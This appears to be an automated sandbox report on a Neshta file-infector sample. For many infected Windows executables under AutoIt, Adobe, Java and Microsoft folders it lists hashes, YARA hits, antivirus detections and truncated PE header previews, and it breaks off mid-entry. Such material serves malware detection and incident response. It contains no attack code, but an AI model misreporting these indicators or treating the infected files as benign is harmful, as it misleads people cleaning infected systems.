                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.481287941039048
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCrwiuLWf6G/YemcUCYY8AZqQwOp9yQeRoL3:sr85C0iuVAYemcUCN8AwhOpCoL
                                                                        MD5:9C8E99E8AD1568B91CBC2A9FE09304A8
                                                                        SHA1:DCD08E9FE8ACFEF7F194CF0E6759F5468FA028EC
                                                                        SHA-256:A33D6E9432C5D3E83EE5CFEC260EB5C1396982EFC713DA6C5B31F67712272B41
                                                                        SHA-512:68270258389E3EC950F6E1535D2EA7271611A57268B7897E4C76237122DF2B7E15884F4F110C11DFB711BDF42F80F682BC0D81D62E16C954EB7AE0EC43DEF349
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):7.2906774035349695
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCloZCsdndoviDI47IcIyh3e01pxDQOF:sr85C+Z1noWILcIys01vQOF
                                                                        MD5:9B9601BFE0B0E353A4AB8B3FA54F7540
                                                                        SHA1:BFCC868475761DB126FBCE6D36A8F3696C00FD3F
                                                                        SHA-256:289C2D7F33C2ACB203D47A677ABEBC41A6D4D580BFBB3E80A4AD65D35DC65AB8
                                                                        SHA-512:AC65B689940E9CA2A02CFE07F7D53C024B3E612621CCA202DAAE1E37709D66C713C7865C336DBCF8248FC42A55776B3327F9B2AA71C7FAED2F547AFFC4DC15EE
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.586052312714495
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJZe5EaY1O/TqX0YpwD3nwBoX0M12Pnhq:JxqjQ+P04wsmJC5QOgVKnwBvPlnJml5
                                                                        MD5:934C8B78754C1FB79DF08EF114600899
                                                                        SHA1:5A50BBC6139CF24D3785A1AC5BC1303087ACCFE6
                                                                        SHA-256:12A68206D1263D798EB284C9A6EF654E4ACFAD20310AFAADB092B54A20358A3A
                                                                        SHA-512:DFF08DAADC807CF170FDC13D4C2EC20D0567B6B4F91D1853F737A6B57ECBBD332EC98D237EF4705E77693361AC3027D0298F194BD10472A2AFF9338616B8C47D
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.529393382316189
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC34bCTNhZYt+zphjirUcYkzzaOvo:sr85C3MCR74+/+YcW6o
                                                                        MD5:B6BA74867ECBA5541827551FEEC46F7A
                                                                        SHA1:62AFF9292E306BC442F46D8835CDBA2F777A0BF1
                                                                        SHA-256:8D6A0F83B4FB84B8670BB9C103071B4D40CA433876242B476DB83BDB683FC446
                                                                        SHA-512:850385B0D7ECF20BEC4406D0EFB1AB0A01D9B42E2011FAFC94A8DDB49932FC3B2EB0F6D486903B84D72518928567E96BAE638891F578B9C7CD32C0CEFAC052C4
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.7205787223638
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCA75/gWXq7+8aTaI/dBKvFBvqNm48fnRV2B:sr85CA0a8aTaI/dMrvkL8fnR6
                                                                        MD5:29BAF7AE561A3CCC4EF6A6988D57324D
                                                                        SHA1:B2D3512E166A5F9E10FAA4E461F6EB5A6B926531
                                                                        SHA-256:0B607DF09D9876EC9A80D77B9F2E20267B611A75DA95962FD2DACFF286E00F9F
                                                                        SHA-512:A8CF29B616CF505F8A52E0775F0B3859F29A56181F3E1D5B16B86B40FD4E5BA0ECC5DD81098AC1024A32A1CA4575CD9B7F9F6FB2D22C75F808FE32A124065015
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\AutoIt3\Uninstall.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.52588514314363
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCWCrRRPYqa5pic6jXFdL2KiMceCry:sr85CWCrbPA6jXFN2MceCry
                                                                        MD5:DF57A3FC85CD6B6CFB31C52714E2D79E
                                                                        SHA1:D4DA4DA44C58BB9B818CAF22C7A578FF1EDECF26
                                                                        SHA-256:E660F04725795D12A67A796BA9A96889216C2CAE4A6ADA2459F7948428136BC1
                                                                        SHA-512:14FBDFFF9E7689A2800A150FB3EB7F50E12A25DEBBC7CF18ADADCDAE925A72DE8E942F5A1AC0023D419C965E2DF9684217D13A95A1AD6C1FF2B61D1B2B814F70
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.484749959894503
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCmG7XF7ifrIgo8SPntaYEll7AJ:sr85C3F7iMMSVCm
                                                                        MD5:2E784E04B6470C8FDD50399F1ED4FF7E
                                                                        SHA1:4B51ACB85DE25350D6331202884C1F405DF8231F
                                                                        SHA-256:B43C70781E9BA983C9EB256B24E80D998EFB3FEC878FF193C9D11709B89A9040
                                                                        SHA-512:2DDB9B10A7514FC5844FDAF47CB0647F020B4359AAC105415F2A143A336AE194124C903A547FBD8C7FE73B596EBB79F958EA84F867CB326FBF203902B63EA67F
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.4710468077094445
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCmGDLaAcF7u9nAlRPL/a9L:sr85C3+u9n8T/aZ
                                                                        MD5:AAB384021CCD99B08F91D550581310EA
                                                                        SHA1:16DE7D37E9B8312551F1EAB96FCAC0CBBA73A166
                                                                        SHA-256:3626F66835F8FD11C6515E55E9CC7B6DA710FFCA9101632CBB69D2F7D2390E71
                                                                        SHA-512:D56589D12F983FF96FE8FF4B9AC4FF0CAD531036272308BB2A2CD4A101D7998005397E8FE50A9E4D3B1EC3E203908DC4EE5071545A844BBB497CF6FE67E0B020
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.426705359459557
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJChNBfkv2pymXndR1wF3u20:sr85Chi3m3pwF+20
                                                                        MD5:84E45C930A79BBB3239D4929503FC38C
                                                                        SHA1:2AED49DEAF2CF13CFAEA97FE5CF217A01E4BD08A
                                                                        SHA-256:CAC1AE6F9B9623E171517C8AE1609A8E21626D9FBF3EE400325E371ACE843444
                                                                        SHA-512:7AFA1BF9237E28AA97918E9806A045A565154599C4DD0882C8B106D25E5410EFCCBDCD01015E156B724009F2A884CA5E1D43C398453769BF9B3021195C6D3FA8
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.599158686971261
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCKhp8N3YERomt8JCeToWZmKbt1H0jKWo:sr85CKn8N3YEuTofE1H0jKWo
                                                                        MD5:294D120414736A7579445CCCA78F505C
                                                                        SHA1:4DC265A2FC75AF686DA3EC830BF9C0072AF14581
                                                                        SHA-256:AF7E482890D77DAD13F0D5A1377DEFA83CF2D802DC1444A69FD17A464C4A446C
                                                                        SHA-512:8DC9F174875DD7012030EC6FE1624AAA99E068DD464BE4AEFDBA9699C39969DF0E52214B90BC46ACE204D2505DDD69C46D674DE39A6BFAA3DE213DFCA66ED196
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.6085003171859364
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKN/MZzagYK5o2IQJ/rVSgvV:sr85C/qA/WadUDFBZz9
                                                                        MD5:89DC2A4E5290AE1297C2281B5CD35068
                                                                        SHA1:1D091812669D1D0CF0293B9D495599BF257434D9
                                                                        SHA-256:5116F46AD2BE5B402FAD8B89350F671576D995ECCF91863D827984AE42319596
                                                                        SHA-512:2CECAFADFE911CAEF8F735192F7F1D60305BBBA6A390E13CDB4B5055413D931B75F276086F18AE36E32FEF31DD3B37FDDECD1FDB9F4EC12938B1EFABCD6D7E07
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.62851477500423
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCsrkFN/GjcAShJITZOG8i4e53hS5PobC:sr85Csk0cA6JITt8cXbC
                                                                        MD5:61694544EA704A28532F4EC0319AC735
                                                                        SHA1:F6ED53FF2792797D40ECA888567873F0570698E6
                                                                        SHA-256:4183F6849773F9EED9279D5237C93719511F605276F0EB9BF2E8B2258BBAED09
                                                                        SHA-512:5004069D9A41811B63CD84A049757A2F2CB061D1D6999FAE9EC083C4AE3C850BAD9D59112B452118A0AA231A4F07145D03C62FDB699074F4610D4899A662C922
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.653521772684421
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKEs2WzzIR++tGuPkNoAvBFbq6DAcBDjFsb:sr85C/qLWos+tGEkBbq6D3Bdsb
                                                                        MD5:50B7F8BD51D8BEA4542C8B6FB7046568
                                                                        SHA1:46FE9571A136EEDD3DC35089F096D47B32EA74C8
                                                                        SHA-256:86A782FF58F3B5F1736EF23051833E340FD56A77C1EDDDBA8ECC5A507BA47EE0
                                                                        SHA-512:87A46E55F78299DA53343B832D84C81C230D46AEFB71C603998DA5F6D0BB3FFE6FDA5F825F5731F7B810E21C1EF8E9812278D07E7402BB3913AF6DD66DD43CE1
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.656070779362061
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKKKajo+iKndnTdkCE1A6n82c6jbs2:sr85C/qo0o+iwdnP6ngIs2
                                                                        MD5:60628C314BCF2A97CCFA9CB4241A2DAB
                                                                        SHA1:6EF748A1568A9AE0D541C5CDF0F74430A59E4DE5
                                                                        SHA-256:FD8BD222DB055C39D6050A10F91EEE576ADDFC37CE78F585ACC48F96E222FA90
                                                                        SHA-512:2AC9ED50008A13A4255ABB338C675D53688D321E6086B6DF17B02A3F89896051F60E8565001CE0B7BCEBD0CD211DED9B9574347BC95A05922700C20806EC93EC
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.6397427450636055
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKHLgwHz2xi03XxQy012eqZwE:sr85C/qMsc2Y03BQz2eqZP
                                                                        MD5:7132D6785E73B1159F3AC9AC5DE71A1C
                                                                        SHA1:0EF8C262E63E3776662064D00E5C4264D0213C8B
                                                                        SHA-256:629945249C52DDB4108FF5C239D4E2C79C92A545ECD25DAE395697831D648A5F
                                                                        SHA-512:804BD2E14C52D226F1D470D0C73B3DE7945EA24EA4554D916FF796E24F6C7C6B5A21284396C6359CBD94ACCE87517D19984F207FEED537AE9DDE8C29D04D2A9E
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.529062771218018
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCPQ5vyh0tYhgw2azkO8rn85GF:sr85CPQ5vyhvcOQn2GF
                                                                        MD5:2FECE9074EC51CAA91DDEA7FBB4FFC54
                                                                        SHA1:35BD848191A5C14897883B9A11BECC6DB522A88F
                                                                        SHA-256:B4D954F33DDFC952FDD208E3EFFCD6A1E442DE8D07C9148C4771986F781C294F
                                                                        SHA-512:F9C3249A39CB4206E495EED2A5C6130CCB04874FBFCB9D0D3D854B6625791E88C2BF29A7AE6C5E57B2B5C4EF25F39AA7BAA4B8C989A3A62D9FCFAF9116417AEB
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, Author: Joe Security
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.4112170834310565
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCUN8aliPc8ZbyHVftptXvVWi6N8rKca:sr85CU6i/XtXv7+8rKca
                                                                        MD5:BA5A5D15C15E1143A35B5ACB9DA43F23
                                                                        SHA1:BE948D6A40AE1221B2E093B6634D695EEDFAD323
                                                                        SHA-256:075242C15AEF5CC590E716651ED3F1F53A8BD23A37CFA60F827DBE60B7DA8918
                                                                        SHA-512:3E36FA618DF02872C1F5043318A8F945912FC5162F8C9ECE7FDA323F7D8AFD53157C00519E50DA9899DA6BF3117CA82011757B987726F968C3B7B5A632066EDA
                                                                        Malicious:true
                                                                        Yara Hits:
